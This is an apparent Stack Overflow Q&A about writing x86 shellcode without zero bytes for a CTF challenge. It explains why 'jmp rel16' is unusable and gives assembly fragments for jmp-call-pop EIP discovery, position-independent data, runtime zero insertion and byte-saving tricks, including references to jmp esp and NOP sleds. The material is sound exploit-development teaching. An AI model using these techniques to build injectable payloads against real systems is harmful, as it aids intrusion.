I am trying to write shellcode for a CTF challenge that does not allow for 0x00 bytes (it will be interpreted as a terminator). Due to restrictions in the challenge, I must do something like this:
[shellcode bulk] [(0x514 - sizeof(shellcode bulk)) filler bytes] [fixed constant data to overwrite global symbols] [shellcode data]
It looks something like this
.intel_syntax noprefix .code32 shellcode: jmp sc_data shellcode_main: #open xor eax, eax pop ebx //file string xor ecx, ecx //flags xor edx, edx //mode mov al, 5 //sys_OPEN int 0x80 ... // more shellcode .org 514, 0x41 // filler bytes .long 0xffffffff // bss constant overwrite sc_data: call shellcode_main .asciz "/path/to/fs/file"
This works beautifully if
sc_data is within 127 bytes of
shellcode. In this case the assembler (GAS) will output a short jump of format:
Opcode Mnemonic EB cb JMP rel8
However, since I have a hard restriction that I need 0x514 bytes for the bulk shellcode and filler bytes, this relative offset will need at least 2-bytes. This would also work because there is a 2-byte relative encoding for the
Opcode Mnemonic E9 cw JMP rel16
Unfortunately, GAS does not output this encoding. Rather it uses the 4-byte offset encoding:
Opcode Mnemonic E9 cd JMP rel32
This results in two MSB bytes of zeros. Something similar to:
e9 01 02 00 00
My question is: can GAS be forced to output the 2-byte variant of the
jmp instruction? I toyed around with multiple smaller 1 byte
jmps, but GAS kept outputting the 4-byte variant. I also tried invoking GCC with
-Os to optimize for size, but it insisted on using the 4-byte relative offset encoding.
Intel jump opcode defined here for reference.
jmp rel16 is only encodeable with an operand-size of 16, which truncates EIP to 16 bits. (The encoding requires a
66 operand-size prefix in 32 and 64-bit mode). As described in the instruction-set reference you linked, or in this more up-to-date PDF->HTML conversion of Intel's manual,
EIP ← tempEIP AND 0000FFFFH; when the operand-size is 16. This is why assemblers never use it unless you manually request it1, and why you can't use
jmp rel16 in 32 or 64-bit code except in the very unusual case where the target is mapped in the low 64kiB of virtual address space2.
You're only jumping forward so you can use
call rel32 to push the address of your data, and because you want your data all the way at the end of your long padded payload.
You could construct a string on the stack with
push imm32/imm8/reg and
mov ebx, esp. (You already have a zeroed register you can push for the terminating zero byte).
If you don't want to construct data on the stack, and instead use data that's part of your payload, use position-independent code / relative addressing for it. Perhaps you have a value in a register that's a known offset from EIP, e.g. if your exploit code was reached with a
jmp esp or other ret-2-reg attack. In that case, you might be able to just
mov ecx, 0x12345678 /
shr ecx, 16 /
lea ebx, [esp+ecx].
Or, if you had to use a NOP sled and you don't know the exact value of EIP relative to any register value, you can obtain the current value of EIP with a
call instruction with a negative displacement. Jump forward over the
call target, then
call back to it. You can put data right after that
call. (But avoiding zero bytes in the data is inconvenient; you can store some once you get a pointer to it.)
# Position-independent 32-bit code to find EIP # and get label addresses into registers # and insert zeros into data that we jumped over. jmp .Lcall .Lget_eip: pop ebx jmp .Lafter_call # jmp rel8 .Lcall: call .Lget_eip # backward rel32 = 0xffffff?? # execution never returns here .Lmsg: .ascii "/path/to/fs/file/" # last byte to be overwritten msglen = . - .Lmsg .Loffset_data2: .long .Ldata2 - .Lmsg # relative offset to other data, or make this a 16-bit int to avoid zeros # max data size 127 - 5 bytes .Lafter_call: # EBX = OFFSET .Lmsg just from the call + pop # Insert a zero at runtime because the data wasn't at the end of the payload mov byte ptr [ebx+ msglen - 1], al # with al=0 # ESI = OFFSET .Ldata2 using an offset loaded from memory mov esi, ebx add esi, [ebx + .Loffset_data2 - .Lmsg] # [ebx + disp8] # with an immediate displacement, avoiding zero bytes mov ecx, ((.Ldata3 - .Lmsg) << 17) | 0xffff shr ecx, 17 # choose shift count to avoid high zeros lea edi, [ebx + ecx] # edi = OFFSET .Ldata3 # if disp8 doesn't work but 8 * disp8 does: small code size push (.Ldata3 - .Lmsg)>>8 # push imm8 pop ecx lea edi, [ebx + ecx*8 + (.Ldata3 - .Lmsg)&7] # disp8 of the low 3 bits ... # at the end of your payload .Ldata2: whatever you want, arbitrary size .Ldata3:
In 64-bit code, it's much easier:
# In 64-bit code jmp .Lafter_data .Lmsg1: .ascii "/foo/bar/" # last bytes to be replaced .Lmsg2: .ascii "/bin/sh/" .Lafter_data: lea rdi, [RIP + .Lmsg1] # negative rel32 lea rsi, [rdi + .Lmsg2 - .Lmsg1] # disp8 xor eax,eax mov byte ptr [rsi - 1], al # insert zeros mov byte ptr [rsi + len], al
Or use a RIP-relative LEA to get a label address and use some zero-avoiding method to add an immediate constant to it to get the address of a label at the end of your payload.
.Lbase: lea rdi, [RIP + .Lbase] xor ecx,ecx mov cx, .Lpath - .Lbase add rdi, rcx # RDI = .Lpath address ... syscall ... # more than 128 bytes .Lpath: .asciz "/foo/bar"
If you really needed to jump far, instead of just position-independent addressing of far-away "static" data.
A chain of short forward jumps would work.
Or use any of the above methods to find the address of a later label in a register, and use
In your case, saving code size doesn't help you avoid long jump displacements, but probably for some other people it will:
You can save code bytes using these Tips for golfing in x86/x64 machine code:
cdqsaves 1 byte vs.
xor ecx, ecx/
mul ecxzeroes three registers in 4 bytes (ECX and EDX:EAX)
int 0x80setup is probably
xor ecx,ecx(2B) /
lea eax, [ecx+5](3B) /
cdq(1B), and don't use
mov al,5at all. You can put arbitrary small constants in registers in only 3 bytes with
pop, or with one
leaif you have another register with a known value.
Footnote 1: asking your assembler to encode
jmp rel16 outside of 16-bit mode:
NASM (in 16, 32 or 64-bit mode)
addr: ; times 256 db 0 ; padding to make it jump farther. o16 jmp near addr ; force 16-bit operand-size and near (not short) displacement
objdump -d decodes it as
jmpw: For the above NASM source assembled into a 32-bit static ELF binary,
objdump -drwC foo shows the truncation of EIP:
0000000000400080 <addr>: 400080: 66 e9 fc ff jmpw 80 <addr-0x400000>
But GAS seems to think that mnemonic is only for indirect jumps (where it would mean a 16-bit load). (
foo.S:5: Warning: indirect jmp without '*'), and this GAS source:
.org 1024; addr: .zero 128; jmpw addr gives you
480: 66 ff 25 00 04 00 00 jmpw *0x400 483: R_386_32 .text
See what is jmpl instruction in x86? - this insane inconsistency in how GAS handles AT&T syntax applies even to
jmp 0x400 when assembling in 16-bit mode would be a relative jump to that absolute offset.
In the extremely unlikely case you wanted a
jmp rel16 in other modes, you'd have to assemble it yourself with
.short. I don't think there's even a way to get the assembler to emit it for you.
Footnote 2: You can't use
jmp rel16 in 32/64-bit code, unless you're attacking some code mapped in the low 64kiB of virtual address space, e.g. maybe something running under DOSEMU or WINE. Linux's default setting for
/proc/sys/vm/mmap_min_addr is 65536, not 0, so normally nothing can
mmap that memory even if you want to, or presumably load its text segment at that address via the ELF program loader. (So NULL-pointer dereferences with an offset segfault instead of silently accessing memory).
You can be sure that your CTF target won't happen to be running with EIP = IP, and that truncating EIP to IP will just segfault.
User contributions licensed under CC BY-SA 3.0